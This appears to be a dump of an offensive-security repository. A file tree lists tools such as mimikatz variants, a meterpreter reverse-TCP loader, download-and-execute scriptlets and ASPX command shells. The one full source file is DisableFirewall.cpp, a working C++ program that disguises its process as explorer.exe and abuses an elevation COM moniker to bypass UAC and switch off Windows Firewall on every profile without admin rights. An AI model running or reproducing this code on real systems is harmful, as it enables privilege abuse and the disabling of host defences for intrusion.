├── 4.wsc ├── CVE-2017-8464.gif ├── Capcom.sys ├── DisableFirewall.cpp ├── Evilwow.png ├── ExpiredPassword.aspx(2013) ├── ExpiredPassword.aspx(2013)(HyperShell) ├── HTran.cpp ├── Hacking - Meterpreter Cheat Sheet.pdf ├── IFileOperation.cpp ├── MSBuildShelltest.csproj ├── MasqueradePEB.cpp ├── MicTray.exe ├── MicTray64.exe ├── Microsoft.ActiveDirectory.Management.dll ├── Microsoft.Exchange.Data(dll of Exchange2010).zip ├── Mimkatz-dcsync.zip ├── MySIP.c ├── NodeJS-Downloader.zip ├── PageLoad_ghostfile.aspx ├── RunProcessHacker.msi ├── SharpPELoader_parselsass.cs ├── UserAdd.msi ├── XamlToViewState.zip ├── a.exe ├── addon.node ├── calc.dll ├── calc.hta ├── calc.ppa ├── calc.ps1 ├── calc.xlam ├── calc2.ps1 ├── calc_x64.dll ├── calcbase64.txt ├── calcexit.dll ├── calcmutex.dll ├── calcmutex_x64.dll ├── cliramdisk&imdisk.rar ├── com_zimbra_example_simplejspaction.zip ├── com_zimbra_test.zip ├── csv.xsl ├── csvde.zip ├── dnscmd.exe ├── dnscmd.exe.mui ├── download.js ├── downloadexec.sct ├── downloadexec2.sct ├── downloadexec3.sct ├── dumpert.dll ├── execCmd.aspx ├── execUI.aspx ├── fb.py ├── helloworld.html ├── inline task executes mimikatz.txt ├── katz.txt ├── messagebox.dll ├── meterpreter_reverse_tcp.cpp ├── msg.dll ├── msg_x64.dll ├── netshtest.cpp ├── oabextract ├── putty.exe ├── rar.exe ├── rpcloader.exe ├── test ├── test.conf ├── test.msi ├── test.ps1 ├── test1.sct ├── test2.cab ├── test3.msi ├── testmsi.png ├── testprocexp.exe ├── vbs ├── version.txt ├── version1.txt └── x.py /4.wsc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 10 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /CVE-2017-8464.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/CVE-2017-8464.gif -------------------------------------------------------------------------------- /Capcom.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Capcom.sys -------------------------------------------------------------------------------- /DisableFirewall.cpp: -------------------------------------------------------------------------------- 1 | //Author: 3gstudent 2 | //Use to disable Windows Firewall with normal user permissions. 3 | //Expand on IFileOperation of UAC bypass. 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #define RTL_MAX_DRIVE_LETTERS 32 10 | #define GDI_HANDLE_BUFFER_SIZE32 34 11 | #define GDI_HANDLE_BUFFER_SIZE64 60 12 | #define GDI_BATCH_BUFFER_SIZE 310 13 | #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 14 | #ifndef NT_SUCCESS 15 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 16 | #endif 17 | 18 | #if !defined(_M_X64) 19 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 20 | #else 21 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 22 | #endif 23 | 24 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 25 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 26 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 27 | 28 | typedef struct _UNICODE_STRING { 29 | USHORT Length; 30 | USHORT MaximumLength; 31 | PWSTR Buffer; 32 | } UNICODE_STRING; 33 | typedef UNICODE_STRING *PUNICODE_STRING; 34 | 35 | 36 | typedef struct _STRING { 37 | USHORT Length; 38 | USHORT MaximumLength; 39 | PCHAR Buffer; 40 | } STRING; 41 | typedef STRING *PSTRING; 42 | 43 | typedef struct _CLIENT_ID { 44 | HANDLE UniqueProcess; 45 | HANDLE UniqueThread; 46 | } CLIENT_ID, *PCLIENT_ID; 47 | 48 | typedef struct _CLIENT_ID64 { 49 | ULONG64 UniqueProcess; 50 | ULONG64 UniqueThread; 51 | } CLIENT_ID64, *PCLIENT_ID64; 52 | 53 | typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { 54 | LIST_ENTRY InLoadOrderLinks; 55 | LIST_ENTRY InMemoryOrderLinks; 56 | union 57 | { 58 | LIST_ENTRY InInitializationOrderLinks; 59 | LIST_ENTRY InProgressLinks; 60 | } DUMMYUNION0; 61 | PVOID DllBase; 62 | PVOID EntryPoint; 63 | ULONG SizeOfImage; 64 | UNICODE_STRING FullDllName; 65 | UNICODE_STRING BaseDllName; 66 | union 67 | { 68 | ULONG Flags; 69 | struct 70 | { 71 | ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1 72 | ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1 73 | ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1 74 | ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1 75 | ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1 76 | ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1 77 | ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1 78 | ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1 79 | ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1 80 | ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1 81 | ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2 82 | ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1 83 | ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1 84 | ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1 85 | ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1 86 | ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2 87 | ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1 88 | ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1 89 | ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1 90 | ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1 91 | ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1 92 | ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1 93 | ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1 94 | ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1 95 | ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2 96 | ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1 97 | ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2 98 | ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1 99 | }; 100 | } ENTRYFLAGSUNION; 101 | WORD ObsoleteLoadCount; 102 | WORD TlsIndex; 103 | union 104 | { 105 | LIST_ENTRY HashLinks; 106 | struct 107 | { 108 | PVOID SectionPointer; 109 | ULONG CheckSum; 110 | }; 111 | } DUMMYUNION1; 112 | union 113 | { 114 | ULONG TimeDateStamp; 115 | PVOID LoadedImports; 116 | } DUMMYUNION2; 117 | //fields below removed for compatibility 118 | } LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; 119 | typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; 120 | 121 | typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; 122 | 123 | typedef struct _PEB_LDR_DATA { 124 | ULONG Length; 125 | BOOLEAN Initialized; 126 | HANDLE SsHandle; 127 | LIST_ENTRY InLoadOrderModuleList; 128 | LIST_ENTRY InMemoryOrderModuleList; 129 | LIST_ENTRY InInitializationOrderModuleList; 130 | PVOID EntryInProgress; 131 | BOOLEAN ShutdownInProgress; 132 | HANDLE ShutdownThreadId; 133 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 134 | 135 | 136 | typedef struct _CURDIR { 137 | UNICODE_STRING DosPath; 138 | HANDLE Handle; 139 | } CURDIR, *PCURDIR; 140 | 141 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 142 | USHORT Flags; 143 | USHORT Length; 144 | ULONG TimeStamp; 145 | STRING DosPath; 146 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 147 | 148 | 149 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 150 | ULONG MaximumLength; 151 | ULONG Length; 152 | 153 | ULONG Flags; 154 | ULONG DebugFlags; 155 | 156 | HANDLE ConsoleHandle; 157 | ULONG ConsoleFlags; 158 | HANDLE StandardInput; 159 | HANDLE StandardOutput; 160 | HANDLE StandardError; 161 | 162 | CURDIR CurrentDirectory; 163 | UNICODE_STRING DllPath; 164 | UNICODE_STRING ImagePathName; 165 | UNICODE_STRING CommandLine; 166 | PVOID Environment; 167 | 168 | ULONG StartingX; 169 | ULONG StartingY; 170 | ULONG CountX; 171 | ULONG CountY; 172 | ULONG CountCharsX; 173 | ULONG CountCharsY; 174 | ULONG FillAttribute; 175 | 176 | ULONG WindowFlags; 177 | ULONG ShowWindowFlags; 178 | UNICODE_STRING WindowTitle; 179 | UNICODE_STRING DesktopInfo; 180 | UNICODE_STRING ShellInfo; 181 | UNICODE_STRING RuntimeData; 182 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 183 | 184 | ULONG EnvironmentSize; 185 | ULONG EnvironmentVersion; 186 | PVOID PackageDependencyData; //8+ 187 | ULONG ProcessGroupId; 188 | // ULONG LoaderThreads; 189 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 190 | 191 | typedef struct _PEB { 192 | BOOLEAN InheritedAddressSpace; 193 | BOOLEAN ReadImageFileExecOptions; 194 | BOOLEAN BeingDebugged; 195 | union 196 | { 197 | BOOLEAN BitField; 198 | struct 199 | { 200 | BOOLEAN ImageUsesLargePages : 1; 201 | BOOLEAN IsProtectedProcess : 1; 202 | BOOLEAN IsImageDynamicallyRelocated : 1; 203 | BOOLEAN SkipPatchingUser32Forwarders : 1; 204 | BOOLEAN IsPackagedProcess : 1; 205 | BOOLEAN IsAppContainer : 1; 206 | BOOLEAN IsProtectedProcessLight : 1; 207 | BOOLEAN IsLongPathAwareProcess : 1; 208 | }; 209 | }; 210 | HANDLE Mutant; 211 | 212 | PVOID ImageBaseAddress; 213 | PPEB_LDR_DATA Ldr; 214 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 215 | PVOID SubSystemData; 216 | PVOID ProcessHeap; 217 | PRTL_CRITICAL_SECTION FastPebLock; 218 | PVOID AtlThunkSListPtr; 219 | PVOID IFEOKey; 220 | union 221 | { 222 | ULONG CrossProcessFlags; 223 | struct 224 | { 225 | ULONG ProcessInJob : 1; 226 | ULONG ProcessInitializing : 1; 227 | ULONG ProcessUsingVEH : 1; 228 | ULONG ProcessUsingVCH : 1; 229 | ULONG ProcessUsingFTH : 1; 230 | ULONG ProcessPreviouslyThrottled : 1; 231 | ULONG ProcessCurrentlyThrottled : 1; 232 | ULONG ReservedBits0 : 25; 233 | }; 234 | ULONG EnvironmentUpdateCount; 235 | }; 236 | union 237 | { 238 | PVOID KernelCallbackTable; 239 | PVOID UserSharedInfoPtr; 240 | }; 241 | ULONG SystemReserved[1]; 242 | ULONG AtlThunkSListPtr32; 243 | PVOID ApiSetMap; 244 | ULONG TlsExpansionCounter; 245 | PVOID TlsBitmap; 246 | ULONG TlsBitmapBits[2]; 247 | PVOID ReadOnlySharedMemoryBase; 248 | PVOID HotpatchInformation; 249 | PVOID *ReadOnlyStaticServerData; 250 | PVOID AnsiCodePageData; 251 | PVOID OemCodePageData; 252 | PVOID UnicodeCaseTableData; 253 | 254 | ULONG NumberOfProcessors; 255 | ULONG NtGlobalFlag; 256 | 257 | LARGE_INTEGER CriticalSectionTimeout; 258 | SIZE_T HeapSegmentReserve; 259 | SIZE_T HeapSegmentCommit; 260 | SIZE_T HeapDeCommitTotalFreeThreshold; 261 | SIZE_T HeapDeCommitFreeBlockThreshold; 262 | 263 | ULONG NumberOfHeaps; 264 | ULONG MaximumNumberOfHeaps; 265 | PVOID *ProcessHeaps; 266 | 267 | PVOID GdiSharedHandleTable; 268 | PVOID ProcessStarterHelper; 269 | ULONG GdiDCAttributeList; 270 | 271 | PRTL_CRITICAL_SECTION LoaderLock; 272 | 273 | ULONG OSMajorVersion; 274 | ULONG OSMinorVersion; 275 | USHORT OSBuildNumber; 276 | USHORT OSCSDVersion; 277 | ULONG OSPlatformId; 278 | ULONG ImageSubsystem; 279 | ULONG ImageSubsystemMajorVersion; 280 | ULONG ImageSubsystemMinorVersion; 281 | ULONG_PTR ImageProcessAffinityMask; 282 | GDI_HANDLE_BUFFER GdiHandleBuffer; 283 | PVOID PostProcessInitRoutine; 284 | 285 | PVOID TlsExpansionBitmap; 286 | ULONG TlsExpansionBitmapBits[32]; 287 | 288 | ULONG SessionId; 289 | 290 | ULARGE_INTEGER AppCompatFlags; 291 | ULARGE_INTEGER AppCompatFlagsUser; 292 | PVOID pShimData; 293 | PVOID AppCompatInfo; 294 | 295 | UNICODE_STRING CSDVersion; 296 | 297 | PVOID ActivationContextData; 298 | PVOID ProcessAssemblyStorageMap; 299 | PVOID SystemDefaultActivationContextData; 300 | PVOID SystemAssemblyStorageMap; 301 | 302 | SIZE_T MinimumStackCommit; 303 | 304 | PVOID *FlsCallback; 305 | LIST_ENTRY FlsListHead; 306 | PVOID FlsBitmap; 307 | ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; 308 | ULONG FlsHighIndex; 309 | 310 | PVOID WerRegistrationData; 311 | PVOID WerShipAssertPtr; 312 | PVOID pContextData; 313 | PVOID pImageHeaderHash; 314 | union 315 | { 316 | ULONG TracingFlags; 317 | struct 318 | { 319 | ULONG HeapTracingEnabled : 1; 320 | ULONG CritSecTracingEnabled : 1; 321 | ULONG LibLoaderTracingEnabled : 1; 322 | ULONG SpareTracingBits : 29; 323 | }; 324 | }; 325 | ULONGLONG CsrServerReadOnlySharedMemoryBase; 326 | } PEB, *PPEB; 327 | 328 | typedef struct _GDI_TEB_BATCH { 329 | ULONG Offset; 330 | UCHAR Alignment[4]; 331 | ULONG_PTR HDC; 332 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 333 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; 334 | 335 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT { 336 | ULONG Flags; 337 | PSTR FrameName; 338 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; 339 | 340 | typedef struct _TEB_ACTIVE_FRAME { 341 | ULONG Flags; 342 | struct _TEB_ACTIVE_FRAME *Previous; 343 | PTEB_ACTIVE_FRAME_CONTEXT Context; 344 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; 345 | 346 | typedef struct _TEB { 347 | NT_TIB NtTib; 348 | 349 | PVOID EnvironmentPointer; 350 | CLIENT_ID ClientId; 351 | PVOID ActiveRpcHandle; 352 | PVOID ThreadLocalStoragePointer; 353 | PPEB ProcessEnvironmentBlock; 354 | 355 | ULONG LastErrorValue; 356 | ULONG CountOfOwnedCriticalSections; 357 | PVOID CsrClientThread; 358 | PVOID Win32ThreadInfo; 359 | ULONG User32Reserved[26]; 360 | ULONG UserReserved[5]; 361 | PVOID WOW32Reserved; 362 | LCID CurrentLocale; 363 | ULONG FpSoftwareStatusRegister; 364 | PVOID SystemReserved1[54]; 365 | NTSTATUS ExceptionCode; 366 | PVOID ActivationContextStackPointer; 367 | #if defined(_M_X64) 368 | UCHAR SpareBytes[24]; 369 | #else 370 | UCHAR SpareBytes[36]; 371 | #endif 372 | ULONG TxFsContext; 373 | 374 | GDI_TEB_BATCH GdiTebBatch; 375 | CLIENT_ID RealClientId; 376 | HANDLE GdiCachedProcessHandle; 377 | ULONG GdiClientPID; 378 | ULONG GdiClientTID; 379 | PVOID GdiThreadLocalInfo; 380 | ULONG_PTR Win32ClientInfo[62]; 381 | PVOID glDispatchTable[233]; 382 | ULONG_PTR glReserved1[29]; 383 | PVOID glReserved2; 384 | PVOID glSectionInfo; 385 | PVOID glSection; 386 | PVOID glTable; 387 | PVOID glCurrentRC; 388 | PVOID glContext; 389 | 390 | NTSTATUS LastStatusValue; 391 | UNICODE_STRING StaticUnicodeString; 392 | WCHAR StaticUnicodeBuffer[261]; 393 | 394 | PVOID DeallocationStack; 395 | PVOID TlsSlots[64]; 396 | LIST_ENTRY TlsLinks; 397 | 398 | PVOID Vdm; 399 | PVOID ReservedForNtRpc; 400 | PVOID DbgSsReserved[2]; 401 | 402 | ULONG HardErrorMode; 403 | #if defined(_M_X64) 404 | PVOID Instrumentation[11]; 405 | #else 406 | PVOID Instrumentation[9]; 407 | #endif 408 | GUID ActivityId; 409 | 410 | PVOID SubProcessTag; 411 | PVOID EtwLocalData; 412 | PVOID EtwTraceData; 413 | PVOID WinSockData; 414 | ULONG GdiBatchCount; 415 | 416 | union 417 | { 418 | PROCESSOR_NUMBER CurrentIdealProcessor; 419 | ULONG IdealProcessorValue; 420 | struct 421 | { 422 | UCHAR ReservedPad0; 423 | UCHAR ReservedPad1; 424 | UCHAR ReservedPad2; 425 | UCHAR IdealProcessor; 426 | }; 427 | }; 428 | 429 | ULONG GuaranteedStackBytes; 430 | PVOID ReservedForPerf; 431 | PVOID ReservedForOle; 432 | ULONG WaitingOnLoaderLock; 433 | PVOID SavedPriorityState; 434 | ULONG_PTR SoftPatchPtr1; 435 | PVOID ThreadPoolData; 436 | PVOID *TlsExpansionSlots; 437 | #if defined(_M_X64) 438 | PVOID DeallocationBStore; 439 | PVOID BStoreLimit; 440 | #endif 441 | ULONG MuiGeneration; 442 | ULONG IsImpersonating; 443 | PVOID NlsCache; 444 | PVOID pShimData; 445 | ULONG HeapVirtualAffinity; 446 | HANDLE CurrentTransactionHandle; 447 | PTEB_ACTIVE_FRAME ActiveFrame; 448 | PVOID FlsData; 449 | 450 | PVOID PreferredLanguages; 451 | PVOID UserPrefLanguages; 452 | PVOID MergedPrefLanguages; 453 | ULONG MuiImpersonation; 454 | 455 | union 456 | { 457 | USHORT CrossTebFlags; 458 | USHORT SpareCrossTebBits : 16; 459 | }; 460 | union 461 | { 462 | USHORT SameTebFlags; 463 | struct 464 | { 465 | USHORT SafeThunkCall : 1; 466 | USHORT InDebugPrint : 1; 467 | USHORT HasFiberData : 1; 468 | USHORT SkipThreadAttach : 1; 469 | USHORT WerInShipAssertCode : 1; 470 | USHORT RanProcessInit : 1; 471 | USHORT ClonedThread : 1; 472 | USHORT SuppressDebugMsg : 1; 473 | USHORT DisableUserStackWalk : 1; 474 | USHORT RtlExceptionAttached : 1; 475 | USHORT InitialThread : 1; 476 | USHORT SpareSameTebBits : 1; 477 | }; 478 | }; 479 | 480 | PVOID TxnScopeEnterCallback; 481 | PVOID TxnScopeExitCallback; 482 | PVOID TxnScopeContext; 483 | ULONG LockCount; 484 | ULONG SpareUlong0; 485 | PVOID ResourceRetValue; 486 | } TEB, *PTEB; 487 | 488 | typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( 489 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 490 | _In_ PVOID Context, 491 | _Inout_ BOOLEAN *StopEnumeration 492 | ); 493 | 494 | typedef PVOID NTAPI RTLINITUNICODESTRING( 495 | _Inout_ PUNICODE_STRING DestinationString, 496 | _In_opt_ PCWSTR SourceString 497 | ); 498 | typedef RTLINITUNICODESTRING FAR * LPRTLINITUNICODESTRING; 499 | LPRTLINITUNICODESTRING RtlInitUnicodeString; 500 | 501 | typedef NTSTATUS NTAPI RTLENTERCRITICALSECTION( 502 | _In_ PRTL_CRITICAL_SECTION CriticalSection 503 | ); 504 | typedef RTLENTERCRITICALSECTION FAR * LPRTLENTERCRITICALSECTION; 505 | LPRTLENTERCRITICALSECTION RtlEnterCriticalSection; 506 | 507 | typedef NTSTATUS NTAPI RTLLEAVECRITICALSECTION( 508 | _In_ PRTL_CRITICAL_SECTION CriticalSection 509 | ); 510 | typedef RTLLEAVECRITICALSECTION FAR * LPRTLLEAVECRITICALSECTION; 511 | LPRTLLEAVECRITICALSECTION RtlLeaveCriticalSection; 512 | 513 | typedef NTSTATUS NTAPI LDRENUMERATELOADEDMODULES( 514 | _In_opt_ ULONG Flags, 515 | _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, 516 | _In_opt_ PVOID Context); 517 | typedef LDRENUMERATELOADEDMODULES FAR * LPLDRENUMERATELOADEDMODULES; 518 | LPLDRENUMERATELOADEDMODULES LdrEnumerateLoadedModules; 519 | 520 | typedef NTSTATUS NTAPI NTALLOCATEVIRTUALMEMORY( 521 | _In_ HANDLE ProcessHandle, 522 | _Inout_ PVOID *BaseAddress, 523 | _In_ ULONG_PTR ZeroBits, 524 | _Inout_ PSIZE_T RegionSize, 525 | _In_ ULONG AllocationType, 526 | _In_ ULONG Protect 527 | ); 528 | typedef NTALLOCATEVIRTUALMEMORY FAR * LPNTALLOCATEVIRTUALMEMORY; 529 | LPNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory; 530 | 531 | //LPWSTR g_lpszExplorer2 = TEXT("C:\\windows\\explorer.exe"); 532 | LPWSTR g_lpszExplorer2 = L"C:\\windows\\explorer.exe"; 533 | 534 | VOID NTAPI supxLdrEnumModulesCallback( 535 | _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, 536 | _In_ PVOID Context, 537 | _Inout_ BOOLEAN *StopEnumeration 538 | ) 539 | { 540 | PPEB Peb = (PPEB)Context; 541 | 542 | if (DataTableEntry->DllBase == Peb->ImageBaseAddress) { 543 | RtlInitUnicodeString(&DataTableEntry->FullDllName, g_lpszExplorer2); 544 | RtlInitUnicodeString(&DataTableEntry->BaseDllName, L"explorer.exe"); 545 | *StopEnumeration = TRUE; 546 | } 547 | else { 548 | *StopEnumeration = FALSE; 549 | } 550 | } 551 | 552 | __inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } 553 | 554 | VOID supMasqueradeProcess( 555 | VOID 556 | ) 557 | { 558 | NTSTATUS Status; 559 | PPEB Peb = NtCurrentPeb(); 560 | SIZE_T RegionSize; 561 | 562 | PVOID g_lpszExplorer = NULL; 563 | RegionSize = 0x1000; 564 | 565 | Status = NtAllocateVirtualMemory( 566 | NtCurrentProcess(), 567 | &g_lpszExplorer, 568 | 0, 569 | &RegionSize, 570 | MEM_COMMIT | MEM_RESERVE, 571 | PAGE_READWRITE); 572 | 573 | if (NT_SUCCESS(Status)) { 574 | RtlEnterCriticalSection(Peb->FastPebLock); 575 | 576 | RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2); 577 | RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2); 578 | RtlInitUnicodeString(&Peb->ProcessParameters->CurrentDirectory.DosPath, L"C:\\windows\\system32"); 579 | 580 | 581 | RtlLeaveCriticalSection(Peb->FastPebLock); 582 | 583 | LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb); 584 | } 585 | } 586 | 587 | 588 | 589 | int _tmain(int argc, _TCHAR* argv[]) 590 | { 591 | HINSTANCE hinstStub = GetModuleHandle(_T("ntdll.dll")); 592 | if(hinstStub) 593 | { 594 | RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(hinstStub, "RtlInitUnicodeString"); 595 | if (!RtlInitUnicodeString) 596 | { 597 | printf("Could not find RtlInitUnicodeString entry point in NTDLL.DLL"); 598 | exit(0); 599 | } 600 | 601 | RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(hinstStub, "RtlEnterCriticalSection"); 602 | if (!RtlEnterCriticalSection) 603 | { 604 | printf("Could not find RtlEnterCriticalSection entry point in NTDLL.DLL"); 605 | exit(0); 606 | } 607 | 608 | RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(hinstStub, "RtlLeaveCriticalSection"); 609 | if (!RtlLeaveCriticalSection) 610 | { 611 | printf("Could not find RtlLeaveCriticalSection entry point in NTDLL.DLL"); 612 | exit(0); 613 | } 614 | 615 | LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(hinstStub, "LdrEnumerateLoadedModules"); 616 | if (!LdrEnumerateLoadedModules) 617 | { 618 | printf("Could not find LdrEnumerateLoadedModules entry point in NTDLL.DLL"); 619 | exit(0); 620 | } 621 | 622 | NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(hinstStub, "NtAllocateVirtualMemory"); 623 | if (!NtAllocateVirtualMemory) 624 | { 625 | printf("Could not find NtAllocateVirtualMemory entry point in NTDLL.DLL"); 626 | exit(0); 627 | } 628 | } 629 | else 630 | { 631 | printf("Could not GetModuleHandle of NTDLL.DLL"); 632 | exit(0); 633 | } 634 | 635 | supMasqueradeProcess(); 636 | 637 | 638 | HRESULT hrComInit = S_OK; 639 | HRESULT hr = S_OK; 640 | INetFwPolicy2 *pNetFwPolicy2 = NULL; 641 | 642 | // Initialize COM. 643 | hrComInit = CoInitializeEx( 644 | 0, 645 | COINIT_APARTMENTTHREADED 646 | ); 647 | 648 | // Ignore RPC_E_CHANGED_MODE; this just means that COM has already been 649 | // initialized with a different mode. Since we don't care what the mode is, 650 | // we'll just use the existing mode. 651 | if (hrComInit != RPC_E_CHANGED_MODE) 652 | { 653 | if (FAILED(hrComInit)) 654 | { 655 | printf("CoInitializeEx failed: 0x%08lx\n", hrComInit); 656 | // Release INetFwPolicy2 657 | if (pNetFwPolicy2 != NULL) 658 | { 659 | pNetFwPolicy2->Release(); 660 | } 661 | 662 | // Uninitialize COM. 663 | if (SUCCEEDED(hrComInit)) 664 | { 665 | CoUninitialize(); 666 | } 667 | return 0; 668 | } 669 | } 670 | 671 | // Retrieve INetFwPolicy2 672 | // hr = WFCOMInitialize(&pNetFwPolicy2); 673 | hr = CoCreateInstance(__uuidof(NetFwPolicy2), NULL, CLSCTX_ALL, IID_PPV_ARGS(&pNetFwPolicy2)); 674 | if (FAILED(hr)) 675 | { 676 | printf("CoCreateInstance for INetFwPolicy2 failed: 0x%08lx\n", hr); 677 | exit(0); 678 | } 679 | 680 | HWND hwnd = GetConsoleWindow(); 681 | BIND_OPTS3 bo; 682 | WCHAR wszCLSID[50]; 683 | WCHAR wszMonikerName[300]; 684 | void ** ppv = NULL; 685 | StringFromGUID2( __uuidof(NetFwPolicy2),wszCLSID,sizeof(wszCLSID)/sizeof(wszCLSID[0])); 686 | hr = StringCchPrintf(wszMonikerName,sizeof(wszMonikerName)/sizeof(wszMonikerName[0]),L"Elevation:Administrator!new:%s", wszCLSID); 687 | memset(&bo, 0, sizeof(bo)); 688 | bo.cbStruct = sizeof(bo); 689 | bo.hwnd = hwnd; 690 | bo.dwClassContext = CLSCTX_LOCAL_SERVER; 691 | hr = CoGetObject(wszMonikerName, &bo, IID_PPV_ARGS(&pNetFwPolicy2)); 692 | 693 | // Disable Windows Firewall for the Domain profile 694 | hr = pNetFwPolicy2->put_FirewallEnabled(NET_FW_PROFILE2_DOMAIN, FALSE); 695 | if (FAILED(hr)) 696 | { 697 | printf("put_FirewallEnabled failed for Domain: 0x%08lx\n", hr); 698 | // Release INetFwPolicy2 699 | if (pNetFwPolicy2 != NULL) 700 | { 701 | pNetFwPolicy2->Release(); 702 | } 703 | 704 | // Uninitialize COM. 705 | if (SUCCEEDED(hrComInit)) 706 | { 707 | CoUninitialize(); 708 | } 709 | return 0; 710 | } 711 | 712 | // Disable Windows Firewall for the Private profile 713 | hr = pNetFwPolicy2->put_FirewallEnabled(NET_FW_PROFILE2_PRIVATE, FALSE); 714 | if (FAILED(hr)) 715 | { 716 | printf("put_FirewallEnabled failed for Private: 0x%08lx\n", hr); 717 | // Release INetFwPolicy2 718 | if (pNetFwPolicy2 != NULL) 719 | { 720 | pNetFwPolicy2->Release(); 721 | } 722 | 723 | // Uninitialize COM. 724 | if (SUCCEEDED(hrComInit)) 725 | { 726 | CoUninitialize(); 727 | } 728 | return 0; 729 | } 730 | 731 | // Disable Windows Firewall for the Public profile 732 | hr = pNetFwPolicy2->put_FirewallEnabled(NET_FW_PROFILE2_PUBLIC, FALSE); 733 | if (FAILED(hr)) 734 | { 735 | printf("put_FirewallEnabled failed for Public: 0x%08lx\n", hr); 736 | // Release INetFwPolicy2 737 | if (pNetFwPolicy2 != NULL) 738 | { 739 | pNetFwPolicy2->Release(); 740 | } 741 | 742 | // Uninitialize COM. 743 | if (SUCCEEDED(hrComInit)) 744 | { 745 | CoUninitialize(); 746 | } 747 | } 748 | return 0; 749 | } 750 | 751 | -------------------------------------------------------------------------------- /Evilwow.png: -------------------------------------------------------------------------------- 